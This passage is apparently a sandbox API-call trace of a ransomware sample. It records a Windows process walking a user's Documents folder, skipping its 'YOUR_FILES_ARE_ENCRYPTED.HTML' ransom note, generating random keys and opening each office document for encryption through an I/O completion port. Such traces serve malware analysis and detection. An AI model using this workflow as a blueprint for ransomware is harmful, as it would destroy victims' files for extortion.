ftCreationTime.dwLowDateTime=0x3d666d50, ftCreationTime.dwHighDateTime=0x1d7ac46, ftLastAccessTime.dwLowDateTime=0xb8376780, ftLastAccessTime.dwHighDateTime=0x1d7bc60, ftLastWriteTime.dwLowDateTime=0xb8376780, ftLastWriteTime.dwHighDateTime=0x1d7bc60, nFileSizeHigh=0x0, nFileSizeLow=0x1819b, dwReserved0=0x0, dwReserved1=0x60, cFileName="0UM7 Sy2QP8qJXxkoN.pptx", cAlternateFileName="0UM7SY~1.PPT")) returned 1 [0166.529] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx") returned 57 [0166.529] lstrcmpW (lpString1="0UM7 Sy2QP8qJXxkoN.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.529] PathFindExtensionW (pszPath="0UM7 Sy2QP8qJXxkoN.pptx") returned=".pptx" [0166.529] lstrlenW (lpString=".pptx") returned 5 [0166.529] PathFindExtensionW (pszPath="0UM7 Sy2QP8qJXxkoN.pptx") returned=".pptx" [0166.529] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\0um7 sy2qp8qjxxkon.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.530] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=98715) returned 1 [0166.530] GetProcessHeap () returned 0x270000 [0166.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.531] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="14") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="52") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="28") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1C") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="B7") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="4E") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="56") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FB") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="5D") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="9C") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="0D") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="92") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="8C") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="10") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="60") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="3F") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="75") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="19") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="45") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="22") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="CE") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="72") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="EA") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="09") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="4B") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="83") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="9B") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="33") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="83") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="07") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FB") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="33") returned 2 [0166.536] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx" [0166.536] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.536] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87a20330, ftCreationTime.dwHighDateTime=0x1d776bc, ftLastAccessTime.dwLowDateTime=0xccf5ae40, ftLastAccessTime.dwHighDateTime=0x1d7cbae, ftLastWriteTime.dwLowDateTime=0xccf5ae40, ftLastWriteTime.dwHighDateTime=0x1d7cbae, nFileSizeHigh=0x0, nFileSizeLow=0x75f8, dwReserved0=0x0, dwReserved1=0x60, cFileName="5f727GEb1uMbxaoBoD.docx", cAlternateFileName="5F727G~1.DOC")) returned 1 [0166.546] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx") returned 57 [0166.546] lstrcmpW (lpString1="5f727GEb1uMbxaoBoD.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.547] PathFindExtensionW (pszPath="5f727GEb1uMbxaoBoD.docx") returned=".docx" [0166.547] lstrlenW (lpString=".docx") returned 5 [0166.547] PathFindExtensionW (pszPath="5f727GEb1uMbxaoBoD.docx") returned=".docx" [0166.547] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\5f727geb1umbxaobod.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.547] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=30200) returned 1 [0166.547] GetProcessHeap () returned 0x270000 [0166.548] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.548] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="FD") returned 2 [0166.548] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="5E") returned 2 [0166.548] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="92") returned 2 [0166.548] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="53") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="9D") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="ED") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="14") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="93") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="41") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A0") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="1B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D0") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="BC") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="1B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="BE") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="6B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C3") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="06") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="17") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="26") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="40") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CC") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F6") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C1") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="8B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="D2") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="02") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="4D") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="39") returned 2 [0166.550] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="CC") returned 2 [0166.550] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="4E") returned 2 [0166.550] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="62") returned 2 [0166.550] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx" [0166.550] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.550] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac8508a0, ftCreationTime.dwHighDateTime=0x1d78d87, ftLastAccessTime.dwLowDateTime=0x7fd60360, ftLastAccessTime.dwHighDateTime=0x1d7949c, ftLastWriteTime.dwLowDateTime=0x7fd60360, ftLastWriteTime.dwHighDateTime=0x1d7949c, nFileSizeHigh=0x0, nFileSizeLow=0x2a92, dwReserved0=0x0, dwReserved1=0x60, cFileName="6_F-VHS8UQkYkU.pptx", cAlternateFileName="6_F-VH~1.PPT")) returned 1 [0166.559] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx") returned 53 [0166.559] lstrcmpW (lpString1="6_F-VHS8UQkYkU.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.559] PathFindExtensionW (pszPath="6_F-VHS8UQkYkU.pptx") returned=".pptx" [0166.559] lstrlenW (lpString=".pptx") returned 5 [0166.559] PathFindExtensionW (pszPath="6_F-VHS8UQkYkU.pptx") returned=".pptx" [0166.559] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\6_f-vhs8uqkyku.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.560] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=10898) returned 1 [0166.560] GetProcessHeap () returned 0x270000 [0166.560] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.561] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="F7") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C9") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="DF") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B4") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="C0") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="F2") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B7") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="91") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="34") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F2") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="57") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="A6") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="45") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B8") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="A1") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="E3") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="A6") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="BE") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="47") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C4") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="70") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="04") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="3A") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C2") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6E") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="8D") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="BC") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="68") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="12") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="F9") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AA") returned 2 [0166.562] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="09") returned 2 [0166.563] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx" [0166.563] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.563] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.572] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55085c20, ftCreationTime.dwHighDateTime=0x1d7ca73, ftLastAccessTime.dwLowDateTime=0xdbf47bc0, ftLastAccessTime.dwHighDateTime=0x1d7cca2, ftLastWriteTime.dwLowDateTime=0xdbf47bc0, ftLastWriteTime.dwHighDateTime=0x1d7cca2, nFileSizeHigh=0x0, nFileSizeLow=0x13300, dwReserved0=0x0, dwReserved1=0x60, cFileName="A2eWfvrOFlzwUW.xlsx", cAlternateFileName="A2EWFV~1.XLS")) returned 1 [0166.572] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx") returned 53 [0166.572] lstrcmpW (lpString1="A2eWfvrOFlzwUW.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.572] PathFindExtensionW (pszPath="A2eWfvrOFlzwUW.xlsx") returned=".xlsx" [0166.572] lstrlenW (lpString=".xlsx") returned 5 [0166.572] PathFindExtensionW (pszPath="A2eWfvrOFlzwUW.xlsx") returned=".xlsx" [0166.572] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\a2ewfvroflzwuw.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.573] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=78592) returned 1 [0166.573] GetProcessHeap () returned 0x270000 [0166.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.574] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="BB") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="B1") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="E6") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="66") returned 2 [0166.574] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="6D") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="48") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="DD") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="04") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E8") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F0") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="37") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="90") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="4D") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AA") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="37") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="5E") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="5C") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="0D") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7A") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="30") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="BF") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="1B") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="EC") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="5B") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="FC") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="2A") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="FC") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CB") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="3A") returned 2 [0166.575] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E4") returned 2 [0166.576] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="76") returned 2 [0166.576] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7C") returned 2 [0166.576] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\A2eWfvrOFlzwUW.xlsx" [0166.576] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.576] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.581] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1214f1a0, ftCreationTime.dwHighDateTime=0x1d7e4f2, ftLastAccessTime.dwLowDateTime=0xbfc90760, ftLastAccessTime.dwHighDateTime=0x1d7e703, ftLastWriteTime.dwLowDateTime=0xbfc90760, ftLastWriteTime.dwHighDateTime=0x1d7e703, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="cXn1G6nnkt", cAlternateFileName="CXN1G6~1")) returned 1 [0166.586] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt") returned 44 [0166.586] GetProcessHeap () returned 0x270000 [0166.586] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0166.586] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt" [0166.586] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\*" [0166.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1214f1a0, ftCreationTime.dwHighDateTime=0x1d7e4f2, ftLastAccessTime.dwLowDateTime=0xbfc90760, ftLastAccessTime.dwHighDateTime=0x1d7e703, ftLastWriteTime.dwLowDateTime=0xbfc90760, ftLastWriteTime.dwHighDateTime=0x1d7e703, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0166.586] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1214f1a0, ftCreationTime.dwHighDateTime=0x1d7e4f2, ftLastAccessTime.dwLowDateTime=0xbfc90760, ftLastAccessTime.dwHighDateTime=0x1d7e703, ftLastWriteTime.dwLowDateTime=0xbfc90760, ftLastWriteTime.dwHighDateTime=0x1d7e703, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.586] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ea11f0, ftCreationTime.dwHighDateTime=0x1d7e6a2, ftLastAccessTime.dwLowDateTime=0x5a8a0980, ftLastAccessTime.dwHighDateTime=0x1d7e6f9, ftLastWriteTime.dwLowDateTime=0x5a8a0980, ftLastWriteTime.dwHighDateTime=0x1d7e6f9, nFileSizeHigh=0x0, nFileSizeLow=0x16d2a, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="4b-1nutJ1.odt", cAlternateFileName="4B-1NU~1.ODT")) returned 1 [0166.587] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt") returned 58 [0166.587] lstrcmpW (lpString1="4b-1nutJ1.odt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.587] PathFindExtensionW (pszPath="4b-1nutJ1.odt") returned=".odt" [0166.587] lstrlenW (lpString=".odt") returned 4 [0166.587] PathFindExtensionW (pszPath="4b-1nutJ1.odt") returned=".odt" [0166.587] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\4b-1nutj1.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.588] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=93482) returned 1 [0166.588] GetProcessHeap () returned 0x270000 [0166.588] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.592] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BA") returned 2 